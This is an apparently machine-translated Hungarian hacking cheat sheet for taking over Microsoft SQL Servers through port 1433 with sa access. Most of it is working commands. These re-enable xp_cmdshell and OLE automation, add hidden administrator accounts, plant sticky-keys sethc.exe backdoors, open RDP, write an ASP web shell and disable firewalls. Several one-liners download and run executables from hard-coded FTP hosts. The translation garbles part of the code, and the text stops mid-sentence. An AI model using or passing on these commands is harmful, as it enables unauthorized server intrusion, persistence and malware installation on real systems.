1433-as javítási megrendelések
net user SQLDebugger list /add net localgroup administrators SQLDebugger /add
Hibaüzenet: Nem találtam meg a tárolt eljárást 'master.. xp_cmdshell'。
Javítási módszer: nagyon általános, valójában a többi 126 127 együtt javítható,
Csakhogy xplog70.dll minden más ezzel a parancsgal megoldható
xp_cmdshell új helyreállítási módszerek 1. lépés: Törlés: Drop eljárás sp_addextendedproc Drop eljárás sp_oacreate az exec sp_dropextendedproc 'xp_cmdshell' Szerver: Msg 3701, 11. szint, 5-ös állapot, 1-es sor Nem lehet eltávolítani a 'sp_addextendedproc' folyamatot, mert az nem létezik a rendszerkönyvtárban. Szerver: Msg 3701, 11. szint, 5-es állapot, sp_dropextendedproc. eljárás, 18. sor Nem lehet eltávolítani a 'xp_cmdshell' folyamatot, mert az nem létezik a rendszerkönyvtárban. 2. lépés: Felépülés: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Közvetlen felépülés, függetlenül attól, hogy létezik-e sp_addextendedproc vagy sem.
xplog70.dll javítások:
Hibaüzenet: A DLL xplog70.dll vagy az általa hivatkozott DLL-ek egyike nem volt csatlakoztatható. Ok: 126 (A megadott modul nem található.) )。
Javítsd meg XPLOG70.DLL (először ellenőrizd a \x86\bin biztonsági mentési könyvtárat a fájllal, majd cseréld le a következő könyvtárat)
1. lépés az exec sp_dropextendedproc 'xp_cmdshell' 2. lépés DBCC addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Nem találtam tárolt eljárást 'master.. xp_cmdshell'。 1. lépés: Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc --- @functname nvarchar(517),/* (tulajdonos.) A hívandó függvény neve
*/ @dllname varchar(255)/* függvényt tartalmazó DLL neve */ mint Indítsd implicit_transactions ha @@trancount > 0 Kezdeni raiserror(15002,-1,-1,'sp_addextendedproc') Visszatérés (1) vége dbcc addextendedproc( @functname, @dllname) visszajelzés (0) -- sp_addextendedproc MENJ
2. lépés: EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell' folyamatához, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban.
; EXECUTIVE sp_configure 'mutasd meg a fejlett opciókat', 1 -- ; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL -- ; EXECUTIVE sp_configure 'xp_cmdshell', 1 -- ; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL -- ; EXECUTIVE sp_configure 'fejlett beállítások megjelenítése', 0 --
Távolítsd el az SQL veszélyes tárolóját: DROP ELJÁRÁS sp_makewebtask Végrehajtó mester.. sp_dropextendedproc xp_cmdshell Végrehajtó mester.. sp_dropextendedproc xp_dirtree Végrehajtó mester.. sp_dropextendedproc xp_fileexist Végrehajtó mester.. sp_dropextendedproc xp_terminate_process Végrehajtó mester.. sp_dropextendedproc sp_oamethod Végrehajtó mester.. sp_dropextendedproc sp_oacreate Végrehajtó mester.. sp_dropextendedproc xp_regaddmultistring Végrehajtó mester.. sp_dropextendedproc xp_regdeletekey Végrehajtó mester.. sp_dropextendedproc xp_regdeletevalue Végrehajtó mester.. sp_dropextendedproc xp_regenumkeys Végrehajtó mester.. sp_dropextendedproc xp_regenumvalues Végrehajtó mester.. sp_dropextendedproc sp_add_job Végrehajtó mester.. sp_dropextendedproc sp_addtask Végrehajtó mester.. sp_dropextendedproc xp_regread Végrehajtó mester.. sp_dropextendedproc xp_regwrite Végrehajtó mester.. sp_dropextendedproc xp_readwebtask Végrehajtó mester.. sp_dropextendedproc xp_makewebtask Végrehajtó mester.. sp_dropextendedproc xp_regremovemultistring Végrehajtó mester.. sp_dropextendedproc sp_OACreate LEDOBÁSI ELJÁRÁS sp_addextendedproc
Kiterjesztett tárolt eljárások visszaállítása Először a sp_addextendedproc visszaállítása, az állítás a következő: Először: Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc --- @functname nvarchar(517),/* (tulajdonos.) a függvény neve */ @dllname varchar(255)/* DLL név, amely tartalmazza */ függvényt */ mint Indítsd implicit_transactions ha @@trancount > 0 Kezdeni raiserror(15002,-1,-1,'sp_addextendedproc') Visszatérés (1) vége dbcc addextendedproc( @functname, @dllname) visszajelzés (0) -- sp_addextendedproc MENJ
Másodszor: Használd mestert az igazgató sp_addextendedproc xp_cmdshell, 'xp_cmdshell.dll' az sp_addextendedproc xp_dirtree exec 'xpstar.dll' az exec sp_addextendedproc xp_enumgroups, 'xplog70.dll' az exec sp_addextendedproc xp_fixeddrives, 'xpstar.dll' az sp_addextendedproc xp_loginconfig vezetője: 'xplog70.dll' az exec sp_addextendedproc xp_enumerrorlogs, 'xpstar.dll' az exec sp_addextendedproc xp_getfiledetails, 'xpstar.dll' az sp_addextendedproc sp_OACreate "odsole70.dll" az exec sp_addextendedproc sp_OADestroy, 'odsole70.dll' az sp_addextendedproc sp_OAGetErrorInfo vezetője: 'odsole70.dll' az exec sp_addextendedproc sp_OAGetProperty, 'odsole70.dll' az exec sp_addextendedproc sp_OAMethod, 'odsole70.dll' az exec sp_addextendedproc sp_OASetProperty, 'odsole70.dll' az exec sp_addextendedproc sp_OAStop, 'odsole70.dll' az exec sp_addextendedproc xp_regaddmultistring, 'xpstar.dll' az exec sp_addextendedproc xp_regdeletekey, 'xpstar.dll' az exec sp_addextendedproc xp_regdeletevalue, 'xpstar.dll' az exec sp_addextendedproc xp_regenumvalues, 'xpstar.dll' az exec sp_addextendedproc xp_regread, 'xpstar.dll' az exec sp_addextendedproc xp_regremovemultistring, 'xpstar.dll' az sp_addextendedproc xp_regwrite vezetője: 'xpstar.dll' az exec sp_addextendedproc xp_availablemedia, 'xpstar.dll'
Töröld azt az utasítást, amely kiterjeszti a tárolt eljárást xp_cmdshell: az exec sp_dropextendedproc 'xp_cmdshell'
A cmdshell SQL utasításának visszaállítása exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Nyisd meg a cmdshell SQL utasítást exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Megállapítsuk, létezik-e tárolóbővítés Válassz count(*) a master.dbo.sysobjects fájlból, ahol xtype='x' és name='xp_cmdshell' A visszaadás eredménye 1, és rendben van
Visszaállítás xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Válassz count(*) a master.dbo.sysobjects fájlból, ahol xtype='x' és name='xp_cmdshell' A visszaadás eredménye 1, és rendben van Ellenkező esetben töltsd fel xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Blokkoljuk a cmdshell SQL utasítását sp_dropextendedproc "xp_cmdshell
Egy. Az SA jelszó módszerének megváltoztatása: Az SQL Comprehensive Utilization Tool-hoz való csatlakozás után hajtsd végre a parancsot: exec sp_password NULL, 'új jelszó', 'sa' (Tipp: óvatosan használd!)
Kettő. Egyszerűen javítsd ki a gyenge jelszót.
1. módszer: Lekérdezés a splitterre a csatlakozás után: ha létezik (válassz * from dbo.sysobjects , ahol id = object_id(N'[dbo].[ xp_cmdshell]') és OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
az sp_dropextendedproc N'[dbo] vezetője. [xp_cmdshell]'
MENJ Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot
2. módszer: Lekérdezés a splitter csatlakoztatása után Az első lépés a végrehajtás: használd a mastert 2. lépés: sp_dropextendedproc 'xp_cmdshell' Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot
A DLL xpsql70.dll vagy az általa hivatkozott DLL egyike nem szerelhető fel. 126-os ok (A megadott modul nem található. ) Helyreállítási módszer: A splitter kapcsolat lekérdezése után, 1. lépés: sp_dropextendedproc "xp_cmdshell" 2. lépés: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
A funkció xp_cmdshell nem található meg a könyvtárban xpweb70.dll. Ok: 127 (A megadott program nem található.) ) Helyreállítási módszer: A splitter kapcsolat lekérdezése után, 1. lépés: Végrehajtás: végrehajtó sp_dropextendedproc 'xp_cmdshell' 2. lépés: az sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll' Ezután nyomd meg az F5 billentyűt, hogy végrehajtsd a parancsot
Ha a fenti módszerek egyike sem visszanyerhető, kérjük, próbálja meg közvetlenül hozzáadni a fiókot az alábbi módszerekkel: Miután lekérdeztem a splitter kapcsolatot, 2000Servser rendszer: deklarare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
Declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP vagy 2003 Server rendszer: 126 hiba! rend
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
deklarare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\ Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell' folyamatához, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban.
Az elemző által végrehajtott utasítások:
EXEC sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; EXECUTIVE sp_configure 'xp_cmdshell', 1; ÚJRAKONFIGURÁLÁS;
Néha, amikor a fenti utasításokat lekérdezés-leszerelő kapcsolattal futtatjuk, a tárolt eljárás nem található meg sp_addextendedproc
Megoldás:
Eljárás létrehozása 1996/08/30 20:13 sp_addextendedproc --- @functname nvarchar(517),/* (tulajdonos.) A hívandó függvény neve */ @dllname varchar(255)/* függvényt tartalmazó DLL neve */ mint Indítsd implicit_transactions ha @@trancount > 0 Kezdeni raiserror(15002,-1,-1,'sp_addextendedproc') Visszatérés (1) vége dbcc addextendedproc( @functname, @dllname) visszajelzés (0) -- sp_addextendedproc MENJ Ezt a kódot beillesztik a lekérdezés-elosztóba és futtatják
Felfedező:
c:\windows\explorer.exe
Tekintse meg a tartalomjegyzéket Executive master.dbo.xp_subdirs 'c:\' Lista lemezek Végrehajtó mester.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Version 5.00 >3389.reg Visszhang. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg visszhang "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg visszhang [HKEY_USERS\. DEFAULT\Billentyűzet elrendezése\Kapcsoló] >>3389.reg echo "Hotkey"="1" >>3389.reg visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg visszhang [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg regedit /s 3389.reg
Nyitva 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
3389-es passz:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Nézd meg a 3389-es portot
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Normál CMD hátsó ajtó xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
A win2K közvetlenül a PS Mar-hoz kerül Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo viszlát>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP közvetlenül PS lovakon Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo viszlát>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Kapcsold át a hátsó ajtó parancsot declène @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declène @o int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Másolj c:\windows\explorer.exe c:\windows\system32\sethc.exe Másolj c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
declène @o int Végrehajtó sp_oacreate 'WSCRIP távolítsa el a t.shell', @o exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX az, amit végrehajtani szeretnél
Írd meg a regiszterben megadott kulcsban megadott értéket), a metódussal (bbb írás a HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue kulcsba):
EXECUTIVE mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\AAA',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Először másold ftp.exe a wmpub könyvtárba @echo CD c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Nyitva 3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL mondatot ír exec master.dbo.xp_subdirs 'd:\web\cdlxkj'; exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA Sandbox mód promóció ----- ---------------------- Végrehajtó mester.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; ------------------------------------------------------- Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")'); ------------------------------------------------------- Válassz * from OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389-ES MŰSZAK
A mondat a következőket használta: Invázió EXECUTIVE mester.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
Helyreállítás EXECUTIVE mester.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE', @value_name='Debugger', @type='REG_SZ', @value=''
Képeltérítés
EXECUTIVE mester.. xp_regwrite --- ez a regiszterszerkesztés! @rootkey='HKEY_LOCAL_MACHINE', ---Ez a pozíció! @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc. EXE', -----Ez is a pozíció! @value_name='Debugger', --- ez az asztal neve! @type='REG_SZ', --- itt van az írás jelentése! @value='C:\WINDOWS\explorer.exe' ---- itt van az írott tartalom!
Az egész folyamat a mester használata: xp_regwrite ez a komponens elkészült,
1.sql parancs, hogy megkérdezzék, a regisztrációs ragasztott kulcsot eltérítették-e
Végrehajtó mester.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql parancs eltéríti a registry sticky key funkciót, és helyette a feladatkezelőre (persze lecserélheted más parancsokkal is).
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql parancs, amellyel eltávolítod a regisztrációs kulcs eltérítési funkcióját, megvédi a szerveredet attól, hogy mások kihasználják
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image fájl végrehajtási opciók\sethc.exe'
SQL Write fájlok
declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Szkriptek NET eszkaláció nélkül
struser=wscrip eltávolítja t.arguments(0) strpass=wscrip eltávolításához t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK") oz="WinNT://"&lp. ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob.create("user",struser) OD. SetPassword strpass OD. SetInfo Set of=GetObject(oz&"/" & struser & ",user") Oe. Add(of. ADsPath)
Minden adminisztrátor az OE-ben. Tagok if struser=admin. Nevezd el akkor. A Wscrip eltávolította a t.echo struser és a "Sikeresen létrehozva!" WSCRIP eltávolítja a T.quit vége ha Következő
Wscrip remove t.echo struser & "User establishment failed!" Mentsd el a fentieket felhasználóként. VBS fájl Ezután futtatd a cscrip használatát, hogy eltávolítsd a user.vbs felhasználónév jelszavát
A JET sandbox mód használatával megoldhatod a tárolt eljárások, például a XP_cmdshell és kapcsolódó dinamikus link könyvtárak által okozott problémákat. Biztonsági okokból a rendszer alapértelmezetten nem kapcsolja be a sandbox módot, ami xp_regwrite megköveteli, hogy bekapcsolja a homokozó módot:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0 \Motorok','SandBoxMode','REG_DWORD',1
Ezután hajtsuk végre a sandbox parancsot, hogy hozzáadj egy felhasználónevű tesztet a 1234-es jelszóval a rendszerhez:
Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
Válassz * from openrowset('microsoft.jet.oledb.4.0','; database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup adminisztrátorok tesztelik /add")')
A különböző operációs rendszerek eltérő útvonalakat használnak, és a helyzethez igazítani kell:
NT/2K: c:\winnt\system32\ XP/2003: c:\windows\system32\
Ezen felül a Microsoft SQL Server 2005-ben egyes tárolt eljárások alapértelmezés szerint zárva vannak, és parancsokat kell megnyitniuk:
Kapcsold be XP_cmdshell:
EXEC sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; EXECUTIVE sp_configure 'xp_cmdshell', 1; ÚJRAKONFIGURÁLÁS;
Nyisd meg az 'OPENROWSET'-et:
exec sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; Executive sp_configure 'Ad hoc terjesztett lekérdezések',1; ÚJRAKONFIGURÁLÁS;
Kapcsold be a 'sp_oacreate'-et:
exec sp_configure 'fejlett beállítások megjelenítése', 1; ÚJRAKONFIGURÁLÁS; Executive sp_configure 'Ole automatizálási eljárások',1; ÚJRAKONFIGURÁLÁS;
Íme néhány helyzet, amikor a végrehajtási parancs a sa alatt hibás: 1. A DLL xpsql70.dll vagy a DLL által hivatkozott DLL nem tölthető. 126-os ok (A megadott modul nem található. ) Ez a helyzet viszonylag gyakori, és a javítás egyszerű, de vannak feltételek. Ha ebben az esetben fel tudod tüntetni a könyvtárat (a sqltools v2.0-nál van egy könyvtár funkció), Gratulálok ehhez a 80%-os helyzethez, hogy megoldható, ha fel tudod tüntetni a könyvtárat, akkor csak keresd meg a xplog70.dll útvonalat, és hajtsd végre a következő parancsot. 1. lépés exec sp_dropextendedproc 'xp_cmdshell' (ez a parancs az eredeti cmdshell törlése, mert már elromlott) 2. lépés dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll") ; EXECUTIVE sp_configure 'fejlett opciókat mutat', 0 – Természetesen ez egy SQL parancs, amelyet lekérdezési analizátorral hajtanak végre. A c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll a második lépésben a xplog70.dll útvonala, ez az út viszonylag gyakori, ha a c meghajtón nincs ilyen, más meghajtó betűket is találhatsz. 2. Nem találom meg a xp_cmdshell funkciót a könyvtárban xpweb70.dll. Ok: 127 (A megadott program nem található.) ) Valójában ez ugyanaz, mint a fenti 126, vagyis a cmdshell hibás, amíg megtalálod a biztonsági mentést xplog70.dll kövesd a fenti módszert a javításhoz. 3. Nem találták meg a tárolt eljárást, a 'mester'. XPCMDSHELL' Ebben az esetben az interneten látom, hogy a módszer a következő: 1. lépés: Törlés: Drop eljárás sp_addextendedproc Drop eljárás sp_oacreate az exec sp_dropextendedproc 'xp_cmdshell' 2. lépés: Felépülés: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Valójában ez még mindig ugyanaz, mint a fentiek, sőt, ha óvatos vagy, a fenti 126 127 csak a tárolt eljárást nem találja meg a 'master:). XPCMDSHELL', mert az első lépés a cmdshell tárolt eljárásának törlése. Ebben az esetben csak kövesd a fent említett második lépést. 4. Hibaüzenet: Az SQL Server blokkolta a hozzáférést a 'xp_cmdshell' komponens 'sys.xp_cmdshell'-jéhez, mert ezt a komponenst a szerver biztonsági konfigurációjának részeként leállították. A rendszergazdák a sp_configure használatával engedélyezhetik az 'xp_cmdshell'-t. További információért a xp_cmdshell engedélyezéséről lásd a Peripheral App Configurator (Peripheral App Configurator) címet az SQL Server Online Books sorozatban. Ez a helyzet a legegyszerűbb, mert nem kell semmire gondolkodni, csak végrehajtod a következő parancsot ; EXECUTIVE sp_configure 'mutasd meg a fejlett opciókat', 1 -- ; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL -- ; EXECUTIVE sp_configure 'xp_cmdshell', 1 -- ; ÚJRAKONFIGURÁLÁS FELÜLÍRÁSSAL -- ; EXECUTIVE sp_configure 'fejlett opciókat mutat', 0 –
A fenti javítás után végrehajthatod a cmd parancsot, és elkezded emelni az erődet. Általában először az IP-t nézem meg, hogy intranet-e, majd REG lekérdezést kérek a HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber a terminál portjának ellenőrzésére, majd netstat –an, hogy megnézzem, nyitva van-e a terminál, majd a net felhasználói jelszót / Add hozzá egy felhasználót, majd net-localgroup adadrátorok user /add Ha minden jól megy, ez lebontja a szervert. De sok probléma van a folyamat során. 1. A nettó teljesítmény előállítása sikeres, de nem tud csatlakozni a terminálhoz. A következő helyzetek vannak (1) A szerver az intraneten van. (2) TCP/IP szűrés. Először a következő parancsparancsot hajtsd végre: cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, exportáld a regiszter első részét TCP/IP szűréshez cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, exportáld a regiszterkönyv második részét TCP/IP szűréshez cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", exportálva a TCP/IP szűrésről szóló harmadik helyet a nyilvántartásban Ezután menj vissza a c meghajtóhoz 1.reg, 2.reg, 3.reg, töltsd le a 1.reg-t, 2.reg, 3.reg vissza a merevlemezedre szerkesztéshez, keresd meg az EnableSecurityFilters mezőt, hogy megnézd, a dword utáni kulcsérték 000000000, ha 00000001, az azt jelenti, hogy az adminisztrátor tcp/ip szűrést végezt, csak 1-et kell 0-ra, 2-re változtatni. Reg és 3.reg ugyanazokat a változtatásokat hajtják végre. (3) Hozz létre IP biztonsági szabályzatot. Futtasd le a cmd parancsot: cmd /c net stop policyagent az IPSEC Services szolgáltatás megállításához. Kapcsold be újra a terminált. (4) Az adminisztrátor által beállított terminál bejelentkezési engedélyét csak a megadott felhasználó használhatja. (5) Tűzfal. Futtatd a cmd parancsot: net stop alg /ynet stop sharedaccess
2. NET eszkaláció jelenik meg, és a hozzáférést megtagadják Próbálkozhatsz net1 felhasználói jelszóval /add Ha a net1 szintén megtagadja a hozzáférést, másolhatsz egy shfit backdoor-t, és megpróbálhatod végrehajtani a cmd parancsot: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe Másolj c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe Ha kérnek, másold ki az 1 fájlt, ami sikeresnek bizonyul. Csatlakozz a terminálhoz, és nyomd meg az 5 shift gombot, hogy lásd, mi jelenik meg. Játssz Kaka Explorerrel, most csak kézzel adj hozzá egy felhasználót. 3. Net-ekaláció történik hozzáférési elutasítási hibával 5 (kiemelés) Ebben az esetben nem kell kipróbálnod a net1-et, próbálkozhatsz a copy shift backdoor-nal, ha a másolás felszólítja a 0 fájl másolását, az bizonyítja, hogy nem sikeres. Ezután megpróbálhatod feltölteni, ha fel tudod tölteni, közvetlenül küldhetsz egy nem-hálózati power escalation eszközt, ami már rég jelent meg, és hozzáadhatsz egy felhasználót. De ezek a legtöbb eset nem tölthető, ezért gondolkodni kell rajta. Mivel a cmd futtatható, akkor a fájl letölthető cmd-n keresztül ftp alatt, de az ftp alapja az, hogy szöveget vagy köteges feldolgozást lehessen írni. Ezután írhatsz egy szöveget vagy csomagot egy SQL utasításon keresztül. declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP' exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp account' exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp jelszó' exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (nincs net ekalációs szkript) c:\en.exe' exec @ret = sp_oamethod @f, 'writeline', NULL,'bye' Miután a lekérdezési analizátor sikeresen elindult, megjelenik egy 1.bat a C meghajtón (ha a végrehajtás sikeres, de a C meghajtó nincs ott, akkor megváltoztathatod a mappát írásra, mert melyik szerver C meghajtó 